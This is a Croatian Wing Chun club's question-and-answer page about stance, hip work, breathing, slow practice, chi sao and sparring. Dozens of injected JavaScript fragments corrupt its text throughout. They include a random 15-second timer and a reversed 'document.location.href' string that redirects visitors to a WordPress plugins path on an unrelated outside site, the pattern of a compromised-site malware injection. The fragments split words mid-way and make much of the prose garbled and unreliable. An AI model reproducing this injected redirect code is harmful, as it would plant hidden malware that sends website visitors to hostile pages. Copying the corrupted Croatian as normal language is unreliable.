Pitanja & Odgovori

Da li ima ispravnog ili neispravnog Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una?

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}bscap0013Ispravnog ili neispravnog Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una nema. Posandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toje samo pokreti koje Wing Chun koristi koji funkcioniraju ili ne. Svaki vježbač andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to sam osjeti i procijeni individualno.

Ljudi trebaju razmišljat svojom glavom i sami zaključiti tj osjetiti dali andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to šta vježbaju funcionira ili ne, a ne samo sljepo pripadati i diviti se učitelju.

Zašandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to je bitan rad kukova u Wing chunu?

Kuk je nakon stava najbitniji dio  u našem treningu.

Korištenjem kuka sa dobrim stabiliteandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom možemo proizvesti jedinu pravu silu udarca, povlačenja, propuštanja ili slično.

Ukoliko bi koristili samo ruke bez kukova onda bi naše ruke gurale tj povlačile, a andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to nije ideja kako Wing Chun trening funkcionira.


Nakon koliko se vidi prvi napredak?

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}bscap0010Prvi napredak ovisi o andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tome koliko polaznik trenira, naravno ako više vježba više se vidi napredak , isandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to tako ukoliko uključi mozak napredak je brži…

Pomaže li u nekim drugim aspektima života osim obrane?andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Wing Chun je osim svoje borbene primjene kao i svaka aktivnost društven i ljudi si međusobno moraju pomagati neovisno o njihovom nivou znanja.

Tako da odgovor na ovo pitanje je da pospješuje socijalne vještine, a ujedno i opušta i zabavlja.

Šandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to ti misliš o isandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tovremenom vježbanju Tai Chi Chuana i Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una?

Svaka vještina je odlična i mislim da je ok vježbati sve šta želite, samo je bitno da se vještine ne mješaju.

Recimo Wing Chun je vještina sama za sebe i koristi svoje principe i svoj način.

Fitness je isandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to tako priča koja je odlična ali ju se nesmije mještati s idejom Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una.

Kod nas u klubu radimo na našem wing chunu ali i našem fitness stanju jer je bitno ne samo radi Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una nego radi općeg stanja tijela.andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}bscap0007

Utjecaj disanja na vještinu?

Ako mislite dali imamo tehnike disanja u treningu onda je odgovor : ”Ne.”

Kod npr Siu Lim Tao forme ljudi se koncentriraju na andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}točnost pokreta pa nekad zaborave na trenutak disati i ta navika nije dobra.

Disanje mora biti prirodno i u skladu sa potrebom.
Kod vježbi kondicijskih ljudi premalo dišu pa se brže i umaraju no kada andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to promjene mogu puno više.

Taj dio je također iskustvo i nije nešandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to o čemu se mora posebno pisati.

Čuo sam da je prvo bitno naučiti polako … jel andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to istina?

To je andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}točno.

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}bscap0003Vježbanje polako i koncentrirano je bitno,jer  ukoliko radimo polagano vidimo više detalja koji se kod ubrzanog vježbanja gube.

Pokreti moraju biti iste strukrure kada ih ubrzamo ili usporimo, ali put je naravno vježbati polako pa postepeno ubrzavati.

Ja osobno smatram da je polagano vježbanje bez žurbe jedini ispravni put.

Naravno nije andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to lako kako zvuči…:)

Koliki je utjecaj vježbe Chi Sao na vještinu?

Chi sao je vježba stabiliteta, osjećaja namjere, pozicija,kontrole i smatram ju jako korisnom i odličnom. Isandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to tako Chi Sao daje pravu ideju o pozicijama, stabilitetu, primjeni i načinu na koji andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to raditi.

Sam utjecaj vježbe na vještinu je izvrstan ukoliko se Chi Sao pokušava raditi na ispravan način.

Sila nesmije biti korištena iz mišića i chi sao nije vježba udaranja i dokazivanja.

Kada se radi Chi Sao, jel se moze namjerno napraviti “greška” ako želiš da osoba krene i otvori se da imaš priliku za kontru. Jel andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to ima smisla u nekim situacijama ili se Wing Chun ne bavi fintama?


andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}345Ideja kod nas u Chi sau nije borbena nego je ideja oduzeti stabilitet protivniku da bi kasnije napravili napad ovisan o situaciji.

Ukoliko fintiramo u Chi Sao andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to znači da je naše tijelo već izgubilo balans i protivnik andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to može jako dobro iskoristiti protiv nas.

U Chi Sau pokušavamo osjetiti sile, razdvojiti ih i tek kad je protivnik van balansa napraviti napad.

Svako razdvajanje sila i udarce radimo kroz kukove i stabilitet a ne kroz ruke.

Ruke su samo “osjetila” one NISU oslonac.

Radite li u sklopu treninga i kondiciju ?

Da.

Kako bi ljudi osim same vještine bili u boljoj formi i bolje se osjećali naravno da radimo i kondiciju.

Radite li nekakvu vrstu sparinga ?

Sparing se radi,ali tek kada ljudi nauče kontrolu te načine kako andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to raditi.

Sparing nam daje uvid dali naše vježbe koje radimo funkcioniraju ili ne.

Ukoliko neke stvari nemožemo izvest u sparingu bitno je ne oslanjati se na snagu i udarati samo da bi udarilii.

Moramo se vratiti u vježbe i poboljšavati ih kako bi ih kasnije mogli bolje primjeniti u sparingu.

Da li u Wing Chunu se koriste udarci s nogama ili se sve radi rukama ?

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}sigung2Noge su ustvari oslonac u našem Wing Chunu tako da su one bitnije od ruku.

Veliki dio rade kukovi a ruke su tu samo da poprate rad kukova.

Ako želite vidjeti dali netko dobro radi Wing Chun gledajte mu rad nogu, kukova i stava.

Nemojte gledati brzinu ruku ili pokrete rukama.

Kukovi su ti koji daju brzinu rukama, ne gornji dio tijela ili ramena.

Kukovi daju brzinu udarca a  stav nam donosi stabilitet.

Kad andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to imate već ste prešli pola puta kod našeg treninga.

Udarci nogama se rade jednako važno kao i rukama,samo je andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to ovisno i andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tome šta vježbamo i kakva je situacija.

Ako se izgubi ravnoteža u gor sau, npr. izgubis uporište, sandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to je najbolje šandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to čovjek može napraviti da se spasi u takvoj situaciji?

Isandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to kao kad se poskliznete. Pokušat se vratiti nazad u stabilitet ukoliko je andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to moguće.

Je li moja individualna prilagodba stava ispravna ili moram striktno vježbati kako mi učitelj pokazuje?

Učitelj vam daje vježbe i ideju, vi ste taj koji svojom glavom može vidjeti dali je andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to ok ili ne.

Ukoliko me nešandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to pitate i ja neznam odgovor andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to je opet ok jer ćemo onda skupa doći do odgovora i naučiti ispravno. Tako skupa možemo napredovati.

Koliko dugo/puno moram vježbati da bih dosegao vaše znanje vještine?andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Svatko ima svoje iskustvo treninga, ukoliko puno vježbate na ispravan način možemo vrlo brzo biti trening partneri i učiti jedan od drugoga.

Ideja je vježbati Wing Chun s partnerom a ne se uspoređivati ili takmičiti s njim.

Ja sam također samo praktikant kao i svi.

Koliko ima pojaseva?

Pojaseva nema

Posandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toje forme.

Chiu´s Wing Chun Croatia